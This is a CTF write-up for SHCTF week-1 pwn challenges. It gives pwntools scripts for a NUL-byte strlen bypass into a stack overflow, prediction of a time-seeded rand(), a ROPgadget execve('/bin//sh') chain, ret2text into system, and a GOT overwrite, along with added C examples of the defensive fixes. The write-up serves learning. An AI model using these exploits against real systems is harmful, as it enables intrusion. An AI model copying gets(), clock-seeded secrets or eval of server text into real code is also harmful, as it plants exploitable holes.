SHCTF-Pwn

PWN

[WEEK1]nc

Just connect with nc.
flag{9528bc43-e3f4-4610-9019-73186897d17b}

[WEEK1]Four-function calculator

There is nothing of interest anywhere else; only this gets(s) can overflow, but there is also a strlen check that exits the process as soon as the length is greater than 1. So we need a way past that strlen check.

The whitelist check takes the data length from strlen, and strlen stops at the first NUL byte, so the check only sees what comes before the NUL. We can't simply start the input with a NUL byte, though, because it would later be treated as an illegal instruction, so we put a legal instruction that contains a NUL byte at the front and let the shellcode follow behind it as usual.

So we can simply send b'1' + b'\x00' to get past the check, and from there it is an ordinary stack overflow.
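To make that point concrete, here is an added C example (my own code, not code from the writeup or from the challenge binary; the buffer size, the one-character limit and the sample input are constructed for the demo). It puts the strlen()-based whitelist check the writeup describes next to a bounded reader that counts every byte it copies and refuses embedded NULs, so that the length it enforces and the length strlen() later reports are the same number.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Constructed for this example: the input buffer size and the
   "at most one character" rule the writeup describes for the whitelist. */
#define BUF_SIZE 48
#define MAX_EXPR_LEN 1

/* The check as the writeup describes it: the length comes from strlen(),
   which stops at the first NUL byte and never sees what follows it. */
int strlen_check_passes(const char *buf) {
    return strlen(buf) <= MAX_EXPR_LEN;
}

/* Result codes for the bounded reader below. */
enum { READ_OK = 0, READ_TOO_LONG = -1, READ_EMBEDDED_NUL = -2 };

/* A replacement for gets(): copies at most dst_size - 1 bytes of the
   supplied input up to a newline, counting every byte it consumes.  It
   refuses input that would not fit and input that carries a NUL byte, so a
   later strlen() on dst measures exactly what was copied. */
int read_bounded(const unsigned char *src, size_t src_len,
                 char *dst, size_t dst_size) {
    size_t n = 0;
    while (n < src_len && src[n] != '\n') {
        if (src[n] == '\0')
            return READ_EMBEDDED_NUL;
        if (n + 1 >= dst_size)        /* leave room for the terminator */
            return READ_TOO_LONG;
        dst[n] = (char)src[n];
        n++;
    }
    dst[n] = '\0';
    return READ_OK;
}

/* Constructed sample: the writeup's b'1' + b'\x00' prefix followed by
   48 filler bytes, more than BUF_SIZE can hold, then a newline. */
static const unsigned char SAMPLE[] =
    "1\0" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "\n";
static const size_t SAMPLE_LEN = sizeof(SAMPLE) - 1;   /* 51 bytes */

/* What strlen() reports for the sample: 1, because it stops at the NUL. */
size_t sample_length_seen_by_strlen(void) {
    return strlen((const char *)SAMPLE);
}

/* Whether the sample gets through the strlen()-based whitelist check. */
int sample_passes_strlen_check(void) {
    return strlen_check_passes((const char *)SAMPLE);
}

/* What the bounded reader says about the same sample. */
int sample_bounded_read_result(void) {
    char buf[BUF_SIZE];
    return read_bounded(SAMPLE, SAMPLE_LEN, buf, sizeof buf);
}

/* Convenience wrapper for NUL-free text (so callers can try other inputs). */
int read_status(const char *text) {
    char buf[BUF_SIZE];
    return read_bounded((const unsigned char *)text, strlen(text), buf, sizeof buf);
}

int main(void) {
    printf("strlen() sees %zu byte(s) of a %zu-byte input\n",
           sample_length_seen_by_strlen(), SAMPLE_LEN);
    printf("strlen()-based check passes: %d\n", sample_passes_strlen_check());
    printf("bounded reader result: %d (0 ok, -1 too long, -2 embedded NUL)\n",
           sample_bounded_read_result());
    return 0;
}
```

The bounded reader rejects the sample for two independent reasons: it carries a NUL byte, and it is longer than the buffer. Either check alone closes the gap the writeup exploits, because neither relies on strlen() to describe data that gets() has already written.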

from pwn import *
context.log_level = "debug"
# conn = process('./alloc')
conn = remote('112.6.51.212', 31856)
conn.recv()
offset = 0x30                       # filler between the input and the saved registers
func = 0x00000000004015DC           # function to return into
ret = 0x000000000040101a            # ret gadget, keeps the stack 16-byte aligned
# the leading '1' is a legal character for the whitelist; the NUL byte
# right after it makes strlen() report a length of 1
payload = b'1' + b'\x00' + b'A' * offset
payload += p64(0) + p64(ret) + p64(func)   # saved rbp, ret gadget, return address
conn.sendline(payload)
conn.interactive()

[WEEK1]Guess the number

It looks like a lot of work, but it really just compares the number you enter against a server-side random number whose seed is time(0LL).
Just reuse the NewStar week1 script from next door.

from pwn import *
from ctypes import CDLL
context.log_level = 'debug'
dll = CDLL('libc.so.6')             # call the C library's srand()/rand() directly
# io = process('./guess')
io = remote('112.6.51.212', 30364)
seed = dll.time(0) + 1              # server seeds with time(0); +1 allows for the delay
dll.srand(seed)
io.recv()
io.sendline(b'11')
io.sendline(str(dll.rand()).encode())
io.interactive()

If it doesn't match, just try a few more times.
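The reason the script works, and why a retry or two is enough, is that the secret is a pure function of the current second. Here is an added C example (my own code, not the challenge's) that shows the clock-seeded secret the writeup describes next to the fix a service should use instead, a secret drawn from the operating system's entropy source; the seed values used in it are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* The server's secret as the writeup describes it: srand(time(0)) followed
   by rand().  The value is completely fixed by the seed, and the seed is
   just the current second. */
int secret_from_seed(unsigned int seed) {
    srand(seed);
    return rand();
}

/* Secret for a given wall-clock second.  Two machines whose clocks agree
   to within a second compute the same value, which is why the writeup's
   script seeds with time(0)+1 and simply retries when the guess misses. */
int secret_at_second(time_t when) {
    return secret_from_seed((unsigned int)when);
}

/* The fix: take the secret from the OS entropy source rather than from a
   clock-derived seed.  Returns a value in [0, RAND_MAX], or -1 if
   /dev/urandom could not be read.  (getrandom(2) would also do; the plain
   file read keeps this example portable C.) */
long secret_from_os_entropy(void) {
    unsigned int raw;
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL)
        return -1;
    size_t got = fread(&raw, sizeof raw, 1, f);
    fclose(f);
    if (got != 1)
        return -1;
    return (long)(raw % ((unsigned int)RAND_MAX + 1u));
}

int main(void) {
    time_t now = time(NULL);
    printf("clock-seeded secret for this second: %d\n", secret_at_second(now));
    printf("same second, computed again:         %d\n", secret_at_second(now));
    printf("entropy-sourced secret:              %ld\n", secret_from_os_entropy());
    return 0;
}
```

Running it prints the same clock-seeded value twice and a fresh entropy-sourced value each time; the second kind of secret has no relation to the clock, so knowing when the connection was made tells a client nothing about it.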

[WEEK1]hard nc

Connecting with nc from Windows printed a pile of garbage, which had me baffled at first.
base64-decoding it gives the second half of the flag:
5d-a837-53f8030adc9b}
ls -a reveals the hidden file; .gift is the first half of the flag, and joining the two halves gives the flag:
flag{02dfe598-6722-4b5d-a837-53f8030adc9b}

[WEEK1]ropchain

A very nice ROP chain; time to fire up my ROPgadget:
ROPgadget --binary "simplerop" --ropchain

#!/usr/bin/env python3
# execve generated by ROPgadget
from pwn import *
from struct import pack
context.log_level="debug"
conn=remote("112.6.51.212",31885)
#conn = process('./simplerop')
# Padding goes here
p = b'a'*40

p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) *59 # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall
conn.recv()
conn.send(p)
conn.interactive()


[WEEK1]Mental arithmetic

from pwn import *
conn = remote('112.6.51.212', 30295)

# receive the welcome banner
conn.recvuntil(b'Press Enter to start...')
conn.sendline()
conn.recvline()
question = conn.recvline().decode().strip()
parts = question.split('=')
string = parts[0].replace('×', '*')
string = string.replace('÷', '/')
# eval on text the server sent: fine for a CTF, not for anything untrusted
conn.sendline(str(eval(string)).encode())

# the remaining 199 questions follow the same format
for i in range(199):
    conn.recvline()
    conn.recvline()
    question = conn.recvline().decode().strip()
    parts = question.split('=')
    string = parts[0].replace('×', '*')
    string = string.replace('÷', '/')
    conn.sendline(str(eval(string)).encode())

response = conn.recvall().decode().strip()
print(response)
conn.close()

Does this even count as pwn?

[WEEK1]babystack

ret2text
First locate the string $0
main calls _system

from pwn import *
context.log_level = "debug"
conn = remote('112.6.51.212', 31891)
conn.recv()
offset = 0x20                      # filler up to the saved rbp
pop_rdi_ret = 0x400833             # pop rdi ; ret
func = 0x4007AE                    # the call to _system in main
sh = 0x400858                      # address of the "$0" string
payload = b'A' * offset
payload += p64(0) + p64(pop_rdi_ret) + p64(sh) + p64(func)   # saved rbp, rdi = "$0", system
conn.sendline(payload)
conn.interactive()

[WEEK1]showshowway

y sits right below s, so overflowing the string is enough.
At first I kept assuming I should pass 0x4008BE and sent it for ages without success; only after opening gdb did I realize that is an address, and the actual string is showshowway.

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# conn = remote('112.6.51.212', 32461)
conn = process('./showshowway')
conn.recv()
offset = 0x40                      # distance from s to y
payload = b'A' * offset
payload += b'showshowway'          # overwrite y with the expected string
conn.sendline(payload)
conn.interactive()

[WEEK1]pkmon

v1 can be modified to change where the overwrite lands.
Overflow upward directly to modify the GOT, pointing the puts entry at getflag.

from pwn import *
context.log_level = "debug"
# conn = process('./pkmon')
conn = remote('112.6.51.212', 31138)
conn.recv()
conn.sendline(b'0')                # v1 = 0 selects the write location
func = 0x000000000040072B          # getflag
payload = p64(func)                # overwrites the GOT entry of puts
conn.sendline(payload)
conn.interactive()

http://example.com/2023/10/30/SHCTF-WP-PWN/
Author: pjx1314
Published: 30 October 2023